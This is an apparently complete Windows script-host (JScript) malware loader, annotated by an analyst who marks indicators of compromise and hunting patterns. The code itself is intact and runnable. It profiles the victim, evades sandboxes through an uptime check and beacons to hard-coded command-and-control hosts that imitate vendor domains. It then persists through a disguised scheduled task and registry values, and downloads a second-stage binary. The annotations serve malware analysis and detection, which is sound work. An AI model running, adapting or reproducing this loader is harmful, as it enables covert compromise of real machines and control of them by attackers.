// Loader configuration. Analyst note: every value here is a static, signature-able IOC.
var config = {
// Candidate C2 base URLs, tried in order by Loader.DeployClient. The first three
// resemble legitimate vendor/CDN hostnames (Google, Azure, Avast) — presumably
// decoys to blend into proxy logs; not verified here. All are plain http://.
PRIMARY_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
// Campaign tag and build number; both are mixed into the victim id (Loader.GetUid)
// and sent in clear-ish form inside the first beacon.
SOFT_SIG : 'mad24',
SOFT_VERSION: 30,
// Seconds slept after every C2 attempt (C2_REQUEST_SLEEP). C2_FAIL_SLEEP is
// declared but never read anywhere in this file.
C2_REQUEST_SLEEP : 21,
C2_FAIL_SLEEP : 21,
// Number of full passes over PRIMARY_C2 before Loader.DeployClient gives up.
C2_FAIL_COUNT : 20,
// Hard-coded secret folded into the XOR key of every request and response
// (DataTools.DeriveKey). Because the per-request nonce is also sent in the URL,
// all traffic produced by this loader can be decoded offline with this key.
C2_OB_KEY : 'JxTRG4mY',
// Beacon path; the full URL is <C2>/rpc.aspx?ctl=KeepAlive&regclid=...
C2_PREFIX : 'rpc.aspx'
}
// C2 currently in use. Starts at the first candidate and is replaced by the
// first one that returns a valid client payload (Loader.DeployClient).
var SELECTED_C2 = config.PRIMARY_C2[0];
// Polyfill for Math.imul: 32-bit integer multiply with C-like wraparound.
// Installed unconditionally (it replaces any native implementation); presumably
// present because the host's script engine lacks Math.imul. Consumed by
// DataTools.Hash. `var` is kept deliberately for the legacy host.
Math.imul = function (a, b) {
// Split both operands into 16-bit halves so every partial product is exact in
// a double, then recombine modulo 2^32.
var aHi = (a >>> 16) & 0xffff;
var aLo = a & 0xffff;
var bHi = (b >>> 16) & 0xffff;
var bLo = b & 0xffff;
// Cross terms only matter in the upper 16 bits; `>>> 0` normalises them to unsigned.
var cross = ((aHi * bLo + aLo * bHi) << 16) >>> 0;
// `| 0` folds the sum back into a signed 32-bit integer.
return (aLo * bLo + cross) | 0;
};
// Command and path templates used for persistence. Analyst note: these are the
// host-based IOCs — registry key, scheduled-task name and dropped file paths.
var GlobalStrings = {
// Registry root under which Windows.RegWrite stores state
// (values seen in this file: ShimV4, SetupServiceKey, ServerUrl, WebLib32).
REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
// wmic-based execution templates; not referenced anywhere in this file.
WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
WMIC_EXEC : "wmic process call create \"%path%\"",
// One-shot scheduled-task template; not referenced anywhere in this file.
TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
// Recurring scheduled-task template rendered by Loader.Persist (%timeout% = minutes).
TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
// Decoy file that Loader.Persist fills with random letters.
NTFILE_PATH : "C:\\Users\\Public\\prnjobs.data",
// Alternate-data-stream name; not referenced anywhere in this file.
ADS_SSID : "SyncSvc",
// What the scheduled task runs. explorer.exe is handed the dropped .js,
// presumably relying on the default file association to start wscript.exe.
// Loader.Persist writes the client script to that path.
PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\explorer.js",
// Display name of the scheduled task; presumably chosen to look like a print service.
TASK_NAME : "PrintPool Service"
}
// Thin factory over ActiveXObject so that COM ProgIDs are named in one place.
var ObjectProducer = {}
// ProgIDs the loader instantiates; the keys are what GetInstance expects.
ObjectProducer.AccesibleObjects = {
MAIN_SH_OBJECT : 'WScript.Shell', // Run, RegRead/RegWrite, ExpandEnvironmentStrings, Popup
STREAM_ACCESS_OBJECT : 'ADODB.Stream', // never requested through this table; the Base64 helpers create it directly
XML_TREE_OBJECT : 'Microsoft.XMLDOM', // likewise created directly in Base64text
XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument', // likewise, in Base64bytes / Base64Encode
HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP', // Http.Client
FS_DRIVE_OBJECT : 'Scripting.FileSystemObject' // Windows.FsIoObject
};
// Returns the constructor used for COM instantiation (the host's ActiveXObject).
ObjectProducer.GetRootConstructor = function(){
return ActiveXObject;
}
// Instantiates the COM object registered under instanceKey in AccesibleObjects.
// An unknown key passes undefined to the constructor, which presumably throws on the host.
ObjectProducer.GetInstance = function(instanceKey){
var rootConstructor = ObjectProducer.GetRootConstructor();
return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
// Encoding helpers shared by the loader. Analyst note: DeriveKey + RotString are
// the whole C2 obfuscation scheme — a single small integer XORed over every
// code unit — so captured traffic can be decoded offline with these functions.
var DataTools = {};
DataTools.KEY_BASE = 1029;
// Derives a small integer XOR key from keyStr: fold every char code into
// KEY_BASE with XOR, then sum the decimal digits of the result.
DataTools.DeriveKey = function(keyStr){
var folded = DataTools.KEY_BASE;
var idx = 0;
while(idx < keyStr.length){
folded ^= keyStr.charCodeAt(idx);
idx++;
}
// folded is never negative (all inputs are non-negative), so every char is a digit.
var digits = folded.toString().split('');
var total = 0;
for(var d = 0; d < digits.length; d++){
total += parseInt(digits[d], 10);
}
return total;
}
// XORs every UTF-16 code unit of str with key. Self-inverse: the same call
// both obfuscates and de-obfuscates.
DataTools.RotString = function(str, key){
var out = [];
for(var i = 0; i < str.length; i++){
out.push(String.fromCharCode(str.charCodeAt(i) ^ key));
}
return out.join("");
}
// 32-bit multiply/xor string hash seeded with 0xdeadbeef, returned as lowercase
// hex without zero padding. Relies on Math.imul (polyfilled earlier in the file).
DataTools.Hash = function(str){
var h = 0xdeadbeef;
var n = str.length;
for(var i = 0; i < n; i++){
h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
}
// Final avalanche step; `>>> 0` makes the result unsigned before formatting.
h = (h ^ (h >>> 16)) >>> 0;
return h.toString(16);
}
DataTools.Random = {};
// Integer in [ceil(min), floor(max)] from Math.random — not cryptographic;
// the file uses it only for nonces and filler.
DataTools.Random.Number = function(min, max){
var lo = Math.ceil(min);
var hi = Math.floor(max);
var span = hi - lo + 1;
return lo + Math.floor(Math.random() * span);
}
// Random lowercase ASCII string of length len drawn from a qwerty-ordered alphabet.
DataTools.Random.String = function(len){
var alphabet = "qwertyuiopasdfghjklzxcvbnm";
var chars = [];
while(chars.length < len){
var pick = DataTools.Random.Number(0, alphabet.length-1);
chars.push(alphabet.charAt(pick));
}
return chars.join("");
}
DataTools.Strings = {};
// Substitutes %key% placeholders in str from a query-string-like template
// "k1=v1&k2=v2". Only the first occurrence of each placeholder is replaced,
// and a pair without '=' substitutes the literal text "undefined".
DataTools.Strings.ParseTemplate = function(str, templateStr){
var pairs = templateStr.split('&');
var result = str;
for(var p = 0; p < pairs.length; p++){
var kv = pairs[p].split('=');
var placeholder = '%' + kv[0] + '%';
result = result.replace(placeholder, kv[1]);
}
return result;
}
// Wrappers around WScript.Shell and Scripting.FileSystemObject. Both COM
// objects are created at load time, so merely including this file spawns them.
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
// Runs a command line via WScript.Shell.Run with no window-style or wait flag,
// so it presumably returns immediately without waiting for the process.
// Detection note: used by Loader.Persist to launch schtasks.exe from the script host.
Windows.Execute = function(command){
Windows.CoMainObject.Run(command);
}
// Expands %VAR% references in env using the shell's environment.
Windows.GetEnv = function(env){
return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}
// Reads a registry value by full path (no REG_ROOT prefix applied here).
Windows.RegRead = function(path){
return Windows.CoMainObject.RegRead(path);
}
// Writes value under GlobalStrings.REG_ROOT + entry (HKCU; no elevation needed).
Windows.RegWrite = function(entry, value){
Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
// Creates path (overwriting; the `2` is truthy for the overwrite flag) as a
// Unicode text file holding 1024 random lowercase letters plus a newline —
// a decoy with no functional role beyond existing.
Windows.CreateFile = function(path){
var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
fHandle.WriteLine(DataTools.Random.String(1024));
fHandle.Close();
}
// Writes data into the NTFS alternate data stream "path:stream". Despite the
// name it overwrites rather than appends (overwrite flag truthy, unicode=true).
// Not called anywhere in this file.
Windows.AppendDataStream = function(path, stream, data){
var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
fHandle.WriteLine(data);
fHandle.Close();
}
// Saves an ADODB.Stream into the alternate data stream "path:stream"
// (2 = adSaveCreateOverWrite) and closes it. Identical to WriteDataStreamBytes;
// not called anywhere in this file.
Windows.AppendDataStreamB = function(path, stream, data){
data.SaveToFile(path.concat(":").concat(stream), 2);
data.Close();
}
// Overwrites path with data as a (non-Unicode) text file; no trailing newline.
// Used by Loader.Persist to drop the client script.
Windows.WriteData = function(path, data){
var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
fHandle.Write(data);
fHandle.Close();
}
// Saves an ADODB.Stream to path (2 = adSaveCreateOverWrite) and closes it.
// Used by Loader.DeployHost to drop the binary stage.
Windows.WriteBytes = function(path, data){
data.SaveToFile(path, 2);
data.Close();
}
// Same as AppendDataStreamB; not called anywhere in this file.
Windows.WriteDataStreamBytes = function(path, stream, data){
data.SaveToFile(path.concat(":").concat(stream), 2);
data.Close();
}
// Reads the whole of path as text (1 = ForReading). The handle is never
// closed; it is left to the host's garbage collection.
Windows.ReadFile = function(path){
var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
return fHandle.ReadAll();
}
// Connects to the WMI root\cimv2 namespace on pcname ("." = local machine)
// using the winmgmts moniker with impersonation.
Windows.GetWMIProvider = function(pcname){
return GetObject("winmgmts:"+
"{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}
// Returns the SystemUpTime counter of the local host as an integer, taken from
// the first Win32_PerfFormattedData_PerfOS_System row. The value is used by
// Loader.DeployClient as an anti-sandbox check.
Windows.GetUptime = function(){
var wmi = Windows.GetWMIProvider(".");
var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
var e = new Enumerator(queryResult);
return parseInt(e.item().SystemUpTime);
}
// Despite the name, this does not read the processor architecture: it returns
// "32" when the ProductName registry string contains 'Windows 7' and "64"
// otherwise. The value is sent to the C2 as the rtag parameter (Loader.DeployHost),
// so the server presumably picks a payload build on that basis.
Windows.GetArch = function(){
var architecture = "64";
var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
if(product.indexOf('Windows 7') != -1){
architecture = "32";
}
return architecture;
}
// Minimal HTTP client over a single shared MSXML2.XMLHTTP instance.
var Http = {};
Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
// Synchronous GET of url (third Open argument false = blocking). Returns the
// response body on HTTP 200 and "" on any other status or on any exception,
// so a dead or blocked C2 is indistinguishable from an empty reply to callers.
// No custom headers are set; the request carries the host's default XMLHTTP user agent.
Http.Request = function(url){
try{
Http.Client.Open('GET', url, false);
Http.Client.Send();
if(Http.Client.Status == 200)
return Http.Client.ResponseText;
else
return "";
}catch(e){
// Network/COM errors are deliberately swallowed; callers retry.
return ""
}
}
// Victim fingerprinting and beacon construction.
var Loader = {};
// Identity fields, read once at load time from the environment.
Loader.USERNAME = Windows.GetEnv("%username%");
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
// Uptime counter captured at load; checked by DeployClient before any network activity.
Loader.Uptime = Windows.GetUptime();
// "true" when the computer name differs from the user domain — presumably a
// heuristic for "domain-joined" (on a non-domain host USERDOMAIN is normally
// the computer name). Sent to the C2 as a string.
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
// Stable per-victim id: hex hash of identity fields + SOFT_VERSION + SOFT_SIG,
// with SOFT_VERSION appended again as decimal (e.g. "<8 hex chars>30").
// Also serves as key material for decoding C2 responses (see DeployClient/DeployHost).
Loader.GetUid = function(){
return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
}
// Builds the regclid value of the first beacon: identity fields joined with ':',
// XOR-obfuscated with DeriveKey(nonce + C2_OB_KEY), base64-encoded, then
// URL-encoded. The nonce is sent in the same URL (ubwG=), so a defender can
// recover the plaintext with DataTools alone.
Loader.GetInitialRequest = function(nonce){
var uid = Loader.GetUid();
var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
var sessionKey = nonce + config.C2_OB_KEY;
request = request.join(":");
request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
request = Base64Encode(request);
return encodeURIComponent(request);
}
// Builds the beacon path with a fresh 12-letter nonce. forcedRedirect and
// header are random filler; ubwG carries the nonce the server needs to derive
// the request key. Hunting note: "/rpc.aspx?ctl=KeepAlive&regclid=" is a
// stable URL pattern across beacons.
Loader.GetInitialEndpoint = function(){
var nonce = DataTools.Random.String(12)
var request = Loader.GetInitialRequest(nonce);
var endpoint = "/" + config.C2_PREFIX + "?ctl=KeepAlive&regclid=" + request + "&forcedRedirect=" + DataTools.Random.String(12) + "&header=" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
return endpoint;
}
// Fetches the binary next stage ("plugin host") from SELECTED_C2 and drops it
// as %temp%\<uid>.bin. The response body is XOR-decoded with
// DeriveKey(uid + C2_OB_KEY) and then base64-decoded to raw bytes. Nothing in
// this file executes the dropped file; presumably the client script written by
// Loader.Persist does. Returns the full path of the dropped file.
// Hunting note: URL pattern "/go.aspx?link=....&goal=6E&r_ctplGuid=".
Loader.DeployHost = function(){
var temp = Windows.GetEnv("%temp%");
// Really a "Windows 7?" flag, see Windows.GetArch.
var architecture = Windows.GetArch();
var nonce = DataTools.Random.String(12);
var uid = Loader.GetUid();
// The uid is obfuscated with the nonce-based key; the nonce travels as TS2=.
var sessionKey = nonce + config.C2_OB_KEY;
var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
encodedId = Base64Encode(encodedId);
encodedId = encodeURIComponent(encodedId);
var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture);
// An empty reply (Http.Request's failure value) still gets written as an empty file.
pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
var filename = uid.concat(".bin");
Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
return temp.concat("\\").concat(filename);
}
// Main loop: beacon to each C2 until one returns a client script, then persist.
Loader.DeployClient = function() {
// Anti-analysis gate: exit silently if the uptime counter is <= 3000 — if the
// WMI counter is in seconds that is about 50 minutes, which would defeat
// freshly booted sandboxes. No other checks are performed before beaconing.
if (Loader.Uptime <= 3000) {
WScript.Quit(0);
}
// Up to C2_FAIL_COUNT passes over every candidate in PRIMARY_C2.
for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
for (var j = 0; j < config.PRIMARY_C2.length; j++) {
try {
var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
// Responses are XOR-obfuscated with a key derived from uid + C2_OB_KEY (same
// scheme DeployHost uses), not with the per-request nonce.
response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
// A valid answer contains the '<<<CLIENT__' marker followed by a base64 client script.
if (response.indexOf('<<<CLIENT__') !== -1) {
var client = response.replace('<<<CLIENT__', '');
client = Base64text(client);
// Record the working C2 and the victim id under REG_ROOT, then persist.
Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
Windows.RegWrite("SetupServiceKey", Loader.GetUid());
SELECTED_C2 = config.PRIMARY_C2[j];
Loader.Persist(client);
return;
}
} catch (e) {
// Any COM/HTTP/decoding error is swallowed; the next C2 is tried after the sleep.
}
// Fixed delay after every single attempt, successful or not (C2_FAIL_SLEEP is never used).
WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
}
}
}
// Establishes persistence and drops the second stage. Host IOCs produced here:
//  - scheduled task "PrintPool Service" running `explorer.exe C:\Users\Public\explorer.js`
//    every 6 minutes (schtasks.exe launched from the script host);
//  - C:\Users\Public\explorer.js (the decoded client script) and
//    C:\Users\Public\prnjobs.data (1 KB of random letters, decoy);
//  - HKCU\...\Appsw64\ values ServerUrl (client script text) and WebLib32
//    (this loader's own source).
Loader.Persist = function(client){
// Render TASK_LOOP_CREATE with name/command/timeout: /SC Minute /MO 6.
var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
Windows.Execute(taskCommand);
// Despite the value name, ServerUrl holds the whole client script, not a URL.
Windows.RegWrite("ServerUrl", client);
// Stores a copy of this script's own source, presumably so the second stage
// can re-deploy the loader without the original file.
Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
Windows.CreateFile(GlobalStrings.NTFILE_PATH);
Windows.WriteData("C:\\Users\\Public\\explorer.js", client);
// Fetch the binary stage only after persistence is in place.
Loader.DeployHost();
}
// Shows message in a WScript.Shell message box. Not called anywhere in this
// file — presumably a leftover development aid.
function debug(message){
ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
// Decodes a base64 string to text. The XMLDOM bin.Base64 data type does the
// decoding (nodeTypedValue yields the raw bytes); an ADODB.Stream is then
// switched from binary (Type 1) to text (Type 2) to read the bytes as UTF-8.
// Used by Loader.DeployClient to recover the client script.
function Base64text(string){
var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
var element = XmlDOM.createElement("tempContainer");
element.dataType = "bin.Base64";
element.text = string;
var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1;
stream.Open();
stream.Write(element.nodeTypedValue);
stream.Position = 0;
stream.Type = 2;
stream.CharSet = "utf-8";
// The stream is never closed.
return stream.ReadText();
}
// Converts a string to a binary byte array by writing it into a text
// ADODB.Stream with CharSet "ascii" and re-reading it in binary mode.
// Characters outside ASCII are therefore lossy; the only caller (Base64Encode)
// feeds it XOR-obfuscated text, which can contain such characters.
// The stream is never closed.
function StringToBinary(string){
var BinaryStream = new ActiveXObject("ADODB.Stream");
BinaryStream.Type = 2;
BinaryStream.CharSet = "ascii";
BinaryStream.Open();
BinaryStream.WriteText(string);
BinaryStream.Position = 0;
BinaryStream.Type = 1;
BinaryStream.Position = 0;
return BinaryStream.Read();
}
// Decodes a base64 string into an open binary ADODB.Stream and returns the
// stream itself (positioned after the written bytes). The caller is expected
// to SaveToFile and Close it — see Windows.WriteBytes.
function Base64bytes(string){
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.text = string;
var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1;
stream.Open();
stream.Write(element.nodeTypedValue);
return stream;
}
// Base64-encodes a string via MSXML's bin.base64 data type, after converting
// it to bytes with StringToBinary (ASCII-lossy). Line breaks that MSXML
// inserts into long output are stripped. NOTE(analysis): the second replace
// also removes every "//" — '/' is a valid base64 character, so any encoding
// that happens to contain two adjacent slashes is silently corrupted. Left
// as-is here; it documents the sample's actual behaviour, not a fix.
function Base64Encode(string) {
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.nodeTypedValue = StringToBinary(string);
return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Entry point: run the loader unless CLIENT_IMPORT_ENV is defined — presumably
// set by the second stage when it includes this file (the WebLib32 registry
// copy) as a library, so the definitions load without re-beaconing.
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
Loader.DeployClient();
}